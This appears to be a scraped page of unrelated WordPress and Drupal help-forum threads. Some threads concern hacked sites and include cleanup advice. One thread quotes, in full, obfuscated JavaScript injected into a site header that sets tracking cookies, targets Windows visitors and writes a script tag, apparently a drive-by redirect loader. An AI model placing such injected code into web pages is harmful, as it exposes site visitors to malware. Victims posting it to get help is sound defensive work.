About a week ago, I found some strange code in all of my wordpress and SMF sites' files. The code is in every file which uses Wordpress' or SMF's API, even if it's not a default file of the specified system. It's starting with a $zend_framework variable, and if I uncode it with unphp.net, I get an obfuscated strange PHP class.
I contacted my host, if it's a 'normal' error of the zend framework, but they said no, it's some weird code.
I searched for some answer in Google and I found some articles that says that there's some hackers may use this way to hack a Wordpress website, but I did not found any sign of unwished logins to my website, but sometimes it does some weird things, for example, one of my API (which uses Wordpress' API) stopped working perfectly about the time when this code appeared in the files. It's worked before, but after it, for example, instead of the 'Bad request' message it's returned a 'A#' message.
What is this code? It's a bug of the zend framework, or somebody is trying to hack my website?
Here is the code decoded with UnPHP:
http://www.unphp.net/decode/c0958d9db747d5a32c8308ba2fcf4d27/
Someone isn't trying to hack your website, they've succeeded. This is a well known Wordpress exploit. It has nothing to do with Zend Framework (which Wordpress doesn't use). You need to restore your site from a safe backup, or start from a clean Wordpress install.
More info here: http://www.justbeck.com/zend_framework-wordpress-hacks/
Related
I have been developing this website and we had to use Gravity Form plugin.
There was a time when it went very vulnerable and the website was attacked (a massive crash occurred to the site) ever since the website has never been normal every again. It is extremely slow to download sometimes there are some error messages 503 We have securely monitoring the website, have the wordpress and every plugin updated to the latest version or even delete the one without the recent updates but it seems not enough because if you access the website now you will feel that it's extremely slow.
Is there anybody who has experienced this kind of attacked? (especially, from when you got attacked via Gravity Form plugin)
I would really appreciate you answer.
Scott
As Ed Cottrell mentioned you must rebuild your site.
Make a backup of files and database
Write down which plugins you use
Delete everything (leave only wp-content/uploads)
Install clean WP - it will be best if you use the same version you used
Install all the plugins - the data is still in DB, so you won't have configure them again
If you bought a theme - just download it again and install it. If someone made it for you - check it for some strange eval or some js files you dont's know. When you are sure it's clean put it back on the server.
When everything is done, change user passwords and ftp password.
Use https://wordpress.org/plugins/gotmls/ - it will help to find some nasty code.
Good morning,
I have a new client who has been working with an overseas developer and they seem to have simply disappeared. We have tried numerous times to contact them, and I am thinking it is possible something happened to them personally as the site they were working on for the client is still up - and they're nowhere to be found.
The goal was to continue the work they started, as it does seem somewhat extensive - rather than starting fresh. I understand this may sound ridiculous, and apologize for wasting everyone's time if this is simply impossible..
Premise: the site uses wordpress, with the woo-commerce plugin installed - both of which I've used in the past. I have a new wordpress blog and woo-commerce setup for the "new site".
I've been unable to successfully retrieve whatever custom CSS they've written for this, and have really only been able to retrieve the rendered code.
Underlying question:Does anyone have any suggestions for retrieving what has been done on this site, or somehow extracting the work as a theme? We have zero ability to log in to this site via FTP or via the wordpress login. My guess is that I'll have to start the project over from scratch, which naturally would be very disappointing to the client as I am trying to save them some money.
Site in question: http://olshop.filgap.com // http://olshop.filgap.com/shop
I'm working on a Wordpress site that uses the plugin Get Directions.
It works properly and gives me the directions in English, but I want to recieve them in Dutch.
I've tried changing the URL from maps.google.com to alternatives like maps.google.nl and maps.google.com?language=nl-nl
Does anyone know how I can get the directions in Dutch? I have also asked on the official Wordpress forums but I don't know how long it usually takes for them to respond.
Seems impossible. The plugin uses the API URL http://www.mapquestapi.com/geocoding/. And checking the documentation, there is a locale parameter for the /directions Web Service, but nothing like this exist for the /geocoding Web Service, which is the one the plugin uses.
Note that the standard locale codes are in the format language_COUNTRY, eg, nl_NL. I tried to modify the plugin code adding &locale=nl_NL(and other languages), but it made no difference.
I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
That URL at the the end is super suspicious. I googled but found no leads :-(
I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.
Does anyone have any knowledge of this?
That looks strange to me. Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the google analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer then 8 letters. If your site is infected, take it down from the web NOW until your sure it's not.
I have chosen XMLSiteMap module from the most popular usage statistics on Drupal site,
so I assume the module is not too buggy. But the map file is absent.
I've installed this module on my Windows machine into drupal/sites/default/modules.
I've activated all the submodules of XMLSiteMap in admin menu.
Per docs, I've also run cron.php manually to create sitemap.xml in drupal/sites/default/files - but it's just not present there even when second re-install.
How can I force to create sitemap.xml?
(also tried with and w/o clean URLs - still no help).
Also, if there any good reliable alternative for this module?
Are you sure you've installed it properly? Please check the Status report (admin/logs/status in Drupal 5, admin/reports/status in Drupal 6) to ensure that you've got everything right.
It's possible that you haven't set the permissions of sites/default/files properly yet for example.
I'm not sure if this will help you, but if you are looking for an actual created sitemap.xml file rather than navigating to it in the browser I don't believe one is created by the module. I think the module creates a menu callback to create the sitemap file, so a request for sitemap.xml is handled by Drupal's menu system, rather than creating an actual file. There will however be a cached version in sites/default/files/xmlsitemap.
Apologies if this is an oversimplification of the question asked.
I have not had any problems with the reliability of the module myself.
Also make sure you have the latest version installed, it just came out yesterday:
http://drupal.org/project/xmlsitemap
Also, see this issue, seems related to your problem:
http://drupal.org/node/458546
I'd probably recommend trying the 6.x-2.x branch which I've been rewriting to kind of solve all the annoying bugs and architectural problems of the 6.x-1.x branch. It's currently incomplete, but it works for nodes and menu items currently. Taxonomy terms and user profiles will be added soon.
You can find the link to it on the project page. Sorry I can't link since I'm a new user. :)
Running the CRON worked for me:
/admin/reports/status/run-cron